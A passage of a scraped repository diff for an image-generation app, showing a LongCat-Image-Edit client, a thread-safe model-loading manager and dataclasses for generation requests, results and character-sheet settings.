logger.info(f"LongCatEditClient initialized (cpu_offload: {enable_cpu_offload})")
|
| 82 |
+
|
| 83 |
+
def load_model(self) -> bool:
|
| 84 |
+
"""Load the model into memory."""
|
| 85 |
+
if self._loaded:
|
| 86 |
+
return True
|
| 87 |
+
|
| 88 |
+
try:
|
| 89 |
+
logger.info(f"Loading LongCat-Image-Edit from {self.MODEL_ID}...")
|
| 90 |
+
|
| 91 |
+
start_time = time.time()
|
| 92 |
+
|
| 93 |
+
# Import LongCat pipeline
|
| 94 |
+
# Requires latest diffusers: pip install git+https://github.com/huggingface/diffusers
|
| 95 |
+
from diffusers import LongCatImageEditPipeline
|
| 96 |
+
|
| 97 |
+
self.pipe = LongCatImageEditPipeline.from_pretrained(
|
| 98 |
+
self.MODEL_ID,
|
| 99 |
+
torch_dtype=self.dtype,
|
| 100 |
+
)
|
| 101 |
+
|
| 102 |
+
# Apply memory optimization
|
| 103 |
+
if self.enable_cpu_offload:
|
| 104 |
+
self.pipe.enable_model_cpu_offload()
|
| 105 |
+
logger.info("CPU offload enabled (~18GB VRAM)")
|
| 106 |
+
else:
|
| 107 |
+
self.pipe.to(self.device, self.dtype)
|
| 108 |
+
logger.info(f"Model moved to {self.device} (high VRAM mode)")
|
| 109 |
+
|
| 110 |
+
load_time = time.time() - start_time
|
| 111 |
+
logger.info(f"LongCat-Image-Edit loaded in {load_time:.1f}s")
|
| 112 |
+
|
| 113 |
+
self._loaded = True
|
| 114 |
+
return True
|
| 115 |
+
|
| 116 |
+
except Exception as e:
|
| 117 |
+
logger.error(f"Failed to load LongCat-Image-Edit: {e}", exc_info=True)
|
| 118 |
+
return False
|
| 119 |
+
|
| 120 |
+
def unload_model(self):
|
| 121 |
+
"""Unload model from memory."""
|
| 122 |
+
if self.pipe is not None:
|
| 123 |
+
del self.pipe
|
| 124 |
+
self.pipe = None
|
| 125 |
+
|
| 126 |
+
self._loaded = False
|
| 127 |
+
|
| 128 |
+
if torch.cuda.is_available():
|
| 129 |
+
torch.cuda.empty_cache()
|
| 130 |
+
|
| 131 |
+
logger.info("LongCat-Image-Edit unloaded")
|
| 132 |
+
|
| 133 |
+
    def generate(
        self,
        request: GenerationRequest,
        num_inference_steps: Optional[int] = None,
        guidance_scale: Optional[float] = None
    ) -> GenerationResult:
        """
        Edit image using LongCat-Image-Edit.

        Lazy-loads the model on first use. Never raises: all failures are
        wrapped into an error GenerationResult.

        Args:
            request: GenerationRequest object with:
                - prompt: The editing instruction (e.g., "Change the background to a forest")
                - input_images: List with the source image to edit
                - aspect_ratio: Output aspect ratio
            num_inference_steps: Number of denoising steps (default: 50)
            guidance_scale: Classifier-free guidance scale (default: 4.5)

        Returns:
            GenerationResult object
        """
        if not self._loaded:
            if not self.load_model():
                return GenerationResult.error_result("Failed to load LongCat-Image-Edit model")

        # Use defaults if not specified
        if num_inference_steps is None:
            num_inference_steps = self.DEFAULT_STEPS
        if guidance_scale is None:
            guidance_scale = self.DEFAULT_GUIDANCE

        try:
            start_time = time.time()

            # Get input image — editing requires a source image.
            if not request.has_input_images:
                return GenerationResult.error_result("LongCat-Image-Edit requires an input image to edit")

            # Use the first non-None image from the list.
            input_image = None
            for img in request.input_images:
                if img is not None:
                    input_image = img
                    break

            if input_image is None:
                return GenerationResult.error_result("No valid input image provided")

            # Get dimensions from aspect ratio
            width, height = self._get_dimensions(request.aspect_ratio)

            # Resize input image to target dimensions (forces RGB first so
            # RGBA/palette inputs don't break the pipeline).
            input_image = input_image.convert('RGB')
            input_image = input_image.resize((width, height), Image.Resampling.LANCZOS)

            logger.info(f"Editing with LongCat: steps={num_inference_steps}, guidance={guidance_scale}")
            logger.info(f"Edit instruction: {request.prompt[:100]}...")

            # Build generation kwargs
            gen_kwargs = {
                "image": input_image,
                "prompt": request.prompt,
                "negative_prompt": request.negative_prompt or "",
                "guidance_scale": guidance_scale,
                "num_inference_steps": num_inference_steps,
                "num_images_per_prompt": 1,
                # Fixed seed for reproducible output across identical requests.
                "generator": torch.Generator("cpu").manual_seed(42),
            }

            # Generate (inference_mode disables autograd bookkeeping)
            with torch.inference_mode():
                output = self.pipe(**gen_kwargs)
                image = output.images[0]

            generation_time = time.time() - start_time
            logger.info(f"Edited in {generation_time:.2f}s: {image.size}")

            return GenerationResult.success_result(
                image=image,
                message=f"Edited with LongCat-Image-Edit in {generation_time:.2f}s",
                generation_time=generation_time
            )

        except Exception as e:
            logger.error(f"LongCat-Image-Edit generation failed: {e}", exc_info=True)
            return GenerationResult.error_result(f"LongCat-Image-Edit error: {str(e)}")
|
| 217 |
+
|
| 218 |
+
    def edit_with_instruction(
        self,
        source_image: Image.Image,
        instruction: str,
        negative_prompt: str = "",
        num_inference_steps: int = None,  # None -> self.DEFAULT_STEPS (effectively Optional[int])
        guidance_scale: float = None,     # None -> self.DEFAULT_GUIDANCE (effectively Optional[float])
        seed: int = 42
    ) -> GenerationResult:
        """
        Simplified method for instruction-based image editing.

        Lazily loads the model on first use, then runs a single diffusion
        edit pass and wraps the outcome in a GenerationResult (never raises;
        failures are returned as error results).

        Args:
            source_image: The image to edit (converted to RGB before use).
            instruction: Natural language editing instruction.
                Examples:
                - "Change the background to a sunset beach"
                - "Make the person wear a red dress"
                - "Add snow to the scene"
                - "Change the cat to a dog"
            negative_prompt: What to avoid in the output.
            num_inference_steps: Denoising steps (default: 50).
            guidance_scale: CFG scale (default: 4.5).
            seed: Random seed for reproducibility (CPU generator, so the
                seed is device-independent).

        Returns:
            GenerationResult with the edited image, or an error result if
            loading or generation failed.
        """
        # Lazy-load: a failed load is reported as a result, not an exception.
        if not self._loaded:
            if not self.load_model():
                return GenerationResult.error_result("Failed to load LongCat-Image-Edit model")

        # Fill in defaults for unspecified sampler parameters.
        if num_inference_steps is None:
            num_inference_steps = self.DEFAULT_STEPS
        if guidance_scale is None:
            guidance_scale = self.DEFAULT_GUIDANCE

        try:
            start_time = time.time()

            # Ensure RGB
            source_image = source_image.convert('RGB')

            # Truncate the instruction in logs to keep lines readable.
            logger.info(f"Editing image with instruction: {instruction[:100]}...")

            # inference_mode disables autograd bookkeeping for the whole pass.
            with torch.inference_mode():
                output = self.pipe(
                    image=source_image,
                    prompt=instruction,
                    negative_prompt=negative_prompt,
                    guidance_scale=guidance_scale,
                    num_inference_steps=num_inference_steps,
                    num_images_per_prompt=1,
                    # CPU generator keeps results reproducible across GPU setups.
                    generator=torch.Generator("cpu").manual_seed(seed),
                )
                image = output.images[0]

            generation_time = time.time() - start_time
            logger.info(f"Edit completed in {generation_time:.2f}s")

            return GenerationResult.success_result(
                image=image,
                message=f"Edited with instruction in {generation_time:.2f}s",
                generation_time=generation_time
            )

        except Exception as e:
            # Broad catch by design: callers consume GenerationResult, not exceptions.
            logger.error(f"Instruction-based edit failed: {e}", exc_info=True)
            return GenerationResult.error_result(f"Edit error: {str(e)}")
|
| 287 |
+
|
| 288 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 289 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 290 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 291 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 292 |
+
|
| 293 |
+
def is_healthy(self) -> bool:
|
| 294 |
+
"""Check if model is loaded and ready."""
|
| 295 |
+
return self._loaded and self.pipe is not None
|
| 296 |
+
|
| 297 |
+
@classmethod
|
| 298 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 299 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 300 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 301 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/model_manager.py
ADDED
|
@@ -0,0 +1,332 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Model Manager
|
| 3 |
+
=============
|
| 4 |
+
|
| 5 |
+
Manages model loading states and provides a robust interface for
|
| 6 |
+
ensuring models are loaded and validated before generation.
|
| 7 |
+
|
| 8 |
+
States:
|
| 9 |
+
- UNLOADED: No model loaded
|
| 10 |
+
- LOADING: Model is being loaded
|
| 11 |
+
- READY: Model loaded and validated
|
| 12 |
+
- ERROR: Model failed to load
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import logging
|
| 16 |
+
import threading
|
| 17 |
+
import time
|
| 18 |
+
from typing import Optional, Callable, Tuple
|
| 19 |
+
from enum import Enum
|
| 20 |
+
from PIL import Image
|
| 21 |
+
|
| 22 |
+
from .backend_router import BackendRouter, BackendType
|
| 23 |
+
from .character_service import CharacterSheetService
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
logger = logging.getLogger(__name__)
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
class ModelState(Enum):
    """Model loading states (lifecycle tracked by ModelManager)."""
    UNLOADED = "unloaded"  # no model resident; a load may be started
    LOADING = "loading"    # a load is in progress; concurrent loads are rejected
    READY = "ready"        # model loaded and validated; generation allowed
    ERROR = "error"        # last load failed; see the manager's error_message
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
class ModelManager:
    """
    Manages model loading lifecycle with state tracking.

    Ensures models are fully loaded and validated before allowing generation.
    Provides progress callbacks for UI updates during loading.

    Threading: a single Lock guards the LOADING check-and-set, the final
    READY/ERROR transitions, and unload(). Progress fields are written
    outside the lock during a load (single-writer; readers may see slightly
    stale values). NOTE(review): properties read state without the lock —
    fine under a single loader thread, but worth confirming if multiple
    loaders are ever possible.
    """

    def __init__(self):
        self._state = ModelState.UNLOADED
        self._current_backend: Optional[BackendType] = None
        self._service: Optional[CharacterSheetService] = None
        self._error_message: Optional[str] = None
        self._loading_progress: float = 0.0   # 0.0..1.0, updated during load_model
        self._loading_message: str = ""       # human-readable load stage
        self._lock = threading.Lock()         # guards state transitions
        self._cancel_requested = False        # polled cooperatively by load_model

    @property
    def state(self) -> ModelState:
        """Current model state."""
        return self._state

    @property
    def is_ready(self) -> bool:
        """Check if model is ready for generation."""
        return self._state == ModelState.READY

    @property
    def is_loading(self) -> bool:
        """Check if model is currently loading."""
        return self._state == ModelState.LOADING

    @property
    def error_message(self) -> Optional[str]:
        """Get error message if in error state."""
        return self._error_message

    @property
    def loading_progress(self) -> float:
        """Get loading progress (0.0 to 1.0)."""
        return self._loading_progress

    @property
    def loading_message(self) -> str:
        """Get current loading status message."""
        return self._loading_message

    @property
    def current_backend(self) -> Optional[BackendType]:
        """Get currently loaded backend."""
        return self._current_backend

    @property
    def service(self) -> Optional[CharacterSheetService]:
        """Get the character sheet service (only valid when ready).

        Returns None in every non-READY state so callers cannot use a
        half-loaded or failed service by accident.
        """
        if self._state != ModelState.READY:
            return None
        return self._service

    def get_status_display(self) -> Tuple[str, str]:
        """
        Get status message and color for UI display.

        Returns:
            Tuple of (message, color) where color is a CSS color string
        """
        if self._state == ModelState.UNLOADED:
            return "No model loaded", "#888888"
        elif self._state == ModelState.LOADING:
            pct = int(self._loading_progress * 100)
            return f"Loading... {pct}% - {self._loading_message}", "#FFA500"
        elif self._state == ModelState.READY:
            # Prefer the friendly backend name; fall back to the enum repr.
            backend_name = BackendRouter.BACKEND_NAMES.get(
                self._current_backend,
                str(self._current_backend)
            )
            return f"Ready: {backend_name}", "#00AA00"
        elif self._state == ModelState.ERROR:
            return f"Error: {self._error_message}", "#FF0000"
        return "Unknown state", "#888888"

    def request_cancel(self):
        """Request cancellation of current loading operation.

        Cooperative: load_model polls the flag at safe checkpoints; an
        in-flight model download/construction is not interrupted mid-step.
        """
        self._cancel_requested = True
        logger.info("Model loading cancellation requested")

    def load_model(
        self,
        backend: BackendType,
        api_key: Optional[str] = None,
        steps: int = 4,
        guidance: float = 1.0,
        progress_callback: Optional[Callable[[float, str], None]] = None
    ) -> bool:
        """
        Load a model with progress tracking.

        Transitions UNLOADED/READY/ERROR -> LOADING -> READY on success,
        -> ERROR on failure, or -> UNLOADED if cancelled. Only the
        check-and-set and the final transition hold the lock; the slow
        loading work runs unlocked.

        Args:
            backend: Backend type to load
            api_key: API key for cloud backends
            steps: Default steps for generation
            guidance: Default guidance scale
            progress_callback: Callback for progress updates (progress, message)

        Returns:
            True if model loaded successfully
        """
        with self._lock:
            # Reject concurrent loads: only one LOADING transition at a time.
            if self._state == ModelState.LOADING:
                logger.warning("Model is already loading, ignoring request")
                return False

            self._state = ModelState.LOADING
            self._loading_progress = 0.0
            self._loading_message = "Initializing..."
            self._error_message = None
            self._cancel_requested = False

        def update_progress(progress: float, message: str):
            # NOTE(review): writes progress fields without the lock — assumes
            # a single loader thread; confirm if that invariant ever changes.
            self._loading_progress = progress
            self._loading_message = message
            if progress_callback:
                progress_callback(progress, message)

        try:
            # Step 1: Unload previous model if different backend
            update_progress(0.05, "Checking current model...")

            if self._service and self._current_backend != backend:
                update_progress(0.1, "Unloading previous model...")
                try:
                    if hasattr(self._service, 'router'):
                        self._service.router.unload_local_models()
                except Exception as e:
                    # Best-effort: a failed unload should not block the new load.
                    logger.warning(f"Error unloading previous model: {e}")
                self._service = None

            if self._cancel_requested:
                self._state = ModelState.UNLOADED
                return False

            # Step 2: Create service and load model
            backend_name = BackendRouter.BACKEND_NAMES.get(backend, str(backend))
            update_progress(0.15, f"Loading {backend_name}...")

            logger.info(f"Creating CharacterSheetService for {backend.value}")

            # For local models, this will load the model
            # For cloud backends, this just validates the API key
            self._service = CharacterSheetService(
                api_key=api_key,
                backend=backend
            )

            if self._cancel_requested:
                self._state = ModelState.UNLOADED
                self._service = None
                return False

            update_progress(0.7, "Model loaded, configuring...")

            # Step 3: Configure default parameters
            # hasattr-guarded: not every client exposes these knobs.
            if hasattr(self._service.client, 'default_steps'):
                self._service.client.default_steps = steps
            if hasattr(self._service.client, 'default_guidance'):
                self._service.client.default_guidance = guidance

            update_progress(0.8, "Validating model...")

            # Step 4: Validate model is actually working
            is_valid, error = self._validate_model()

            if not is_valid:
                # Raising routes the failure through the single ERROR path below.
                raise RuntimeError(f"Model validation failed: {error}")

            update_progress(1.0, "Ready!")

            # Success!
            with self._lock:
                self._current_backend = backend
                self._state = ModelState.READY
                self._loading_progress = 1.0
                self._loading_message = "Ready"

            logger.info(f"Model {backend.value} loaded and validated successfully")
            return True

        except Exception as e:
            error_msg = str(e)
            logger.error(f"Failed to load model {backend.value}: {error_msg}", exc_info=True)

            with self._lock:
                self._state = ModelState.ERROR
                self._error_message = self._simplify_error(error_msg)
                self._service = None

            if progress_callback:
                progress_callback(0.0, f"Error: {self._error_message}")

            return False

    def _validate_model(self) -> Tuple[bool, Optional[str]]:
        """
        Validate that the model is actually working.

        For local models, checks that the pipeline is loaded.
        For cloud backends, does a minimal health check.

        All checks are hasattr-guarded so clients that lack a given
        attribute simply skip that check.

        Returns:
            Tuple of (is_valid, error_message)
        """
        if self._service is None:
            return False, "Service not initialized"

        try:
            client = self._service.client

            # Check if client has health check method
            if hasattr(client, 'is_healthy'):
                if not client.is_healthy():
                    return False, "Client health check failed"

            # For local models, check pipeline is loaded
            if hasattr(client, '_loaded'):
                if not client._loaded:
                    return False, "Model pipeline not loaded"

            # For FLUX models, verify the pipe exists
            if hasattr(client, 'pipe'):
                if client.pipe is None:
                    return False, "Model pipeline is None"

            return True, None

        except Exception as e:
            return False, str(e)

    def _simplify_error(self, error: str) -> str:
        """Simplify technical error messages for user display.

        Substring matching on the lowercased error; first match wins, and
        anything unrecognized is truncated to ~100 characters.
        """
        error_lower = error.lower()

        if "cuda out of memory" in error_lower or "out of memory" in error_lower:
            return "Not enough GPU memory. Try a smaller model or close other applications."

        if "api key" in error_lower:
            return "Invalid or missing API key."

        if "connection" in error_lower or "network" in error_lower:
            return "Network connection error. Check your internet connection."

        if "not found" in error_lower and "model" in error_lower:
            return "Model files not found. The model may need to be downloaded."

        if "import" in error_lower:
            return "Missing dependencies. Some required packages are not installed."

        if "meta tensor" in error_lower:
            return "Model loading failed (meta tensor error). Try restarting the application."

        # Truncate long errors
        if len(error) > 100:
            return error[:97] + "..."

        return error

    def unload(self):
        """Unload the current model and reset all state to UNLOADED."""
        with self._lock:
            if self._service:
                try:
                    if hasattr(self._service, 'router'):
                        self._service.router.unload_local_models()
                except Exception as e:
                    # Best-effort cleanup: always fall through to state reset.
                    logger.warning(f"Error during unload: {e}")
                self._service = None

            self._state = ModelState.UNLOADED
            self._current_backend = None
            self._error_message = None
            self._loading_progress = 0.0
            self._loading_message = ""

        logger.info("Model unloaded")
|
| 321 |
+
|
| 322 |
+
|
| 323 |
+
# Global singleton for model management
|
| 324 |
+
_model_manager: Optional[ModelManager] = None


def get_model_manager() -> ModelManager:
    """Return the process-wide ModelManager, creating it on first use.

    Lazy singleton: the manager is constructed once and reused for the
    lifetime of the process.
    """
    global _model_manager
    manager = _model_manager
    if manager is None:
        manager = ModelManager()
        _model_manager = manager
    return manager
|
src/models.py
ADDED
|
@@ -0,0 +1,94 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Data Models for Character Sheet Pro
|
| 3 |
+
====================================
|
| 4 |
+
|
| 5 |
+
Dataclasses for generation requests and results.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
from dataclasses import dataclass, field
|
| 9 |
+
from typing import Optional, List, Dict, Any
|
| 10 |
+
from PIL import Image
|
| 11 |
+
from datetime import datetime
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
@dataclass
class GenerationRequest:
    """A single image-generation request: a prompt plus optional references.

    Attributes keep their declaration order and defaults; callers construct
    this positionally or by keyword.
    """

    prompt: str
    input_images: List[Image.Image] = field(default_factory=list)
    aspect_ratio: str = "1:1"
    temperature: float = 0.4
    negative_prompt: Optional[str] = None

    @property
    def has_input_images(self) -> bool:
        """True when at least one reference image was supplied."""
        return bool(self.input_images)
|
| 28 |
+
|
| 29 |
+
|
| 30 |
+
@dataclass
class GenerationResult:
    """Outcome of a generation call: success flag, optional image, message.

    Prefer the two factory classmethods over direct construction so the
    success flag and payload always agree.
    """

    success: bool
    image: Optional[Image.Image] = None
    message: str = ""
    generation_time: Optional[float] = None

    @classmethod
    def success_result(
        cls,
        image: Image.Image,
        message: str = "Generated successfully",
        generation_time: Optional[float] = None
    ) -> "GenerationResult":
        """Wrap a generated image in a successful result."""
        return cls(success=True, image=image, message=message,
                   generation_time=generation_time)

    @classmethod
    def error_result(cls, message: str) -> "GenerationResult":
        """Wrap an error message in a failed result (no image attached)."""
        return cls(success=False, message=message)
|
| 58 |
+
|
| 59 |
+
|
| 60 |
+
@dataclass
class CharacterSheetConfig:
    """Configuration for character sheet generation.

    All values are defaults; override per-instance as needed.
    """

    # Aspect ratios for the two generation stages
    face_aspect_ratio: str = "3:4"  # 864x1184
    body_aspect_ratio: str = "9:16"  # 768x1344

    # Generation temperatures per stage (semantics defined by the backend)
    face_temperature: float = 0.35
    body_temperature: float = 0.35
    normalize_temperature: float = 0.5

    # Layout of the composed sheet
    spacing: int = 20  # gap between panels — presumably pixels; confirm in layout code
    background_color: str = "#2C2C2C"  # dark neutral grey

    # Retry settings for backend calls (delays in seconds)
    max_retries: int = 3
    retry_delay: float = 30.0
    rate_limit_delay_min: float = 2.0  # bounds for the randomized inter-request delay
    rate_limit_delay_max: float = 3.0
|
| 83 |
+
|
| 84 |
+
@dataclass
class CharacterSheetMetadata:
    """Metadata for generated character sheet."""

    character_name: str
    input_type: str  # "Face Only", "Full Body", "Face + Body"
    costume_description: str
    backend: str  # which backend produced the sheet
    # ISO-8601 local-time stamp captured at construction
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    views: int = 7  # number of views composed into the sheet
    stages: Dict[str, Any] = field(default_factory=dict)  # free-form per-stage details
|
src/qwen_image_edit_client.py
ADDED
|
@@ -0,0 +1,495 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
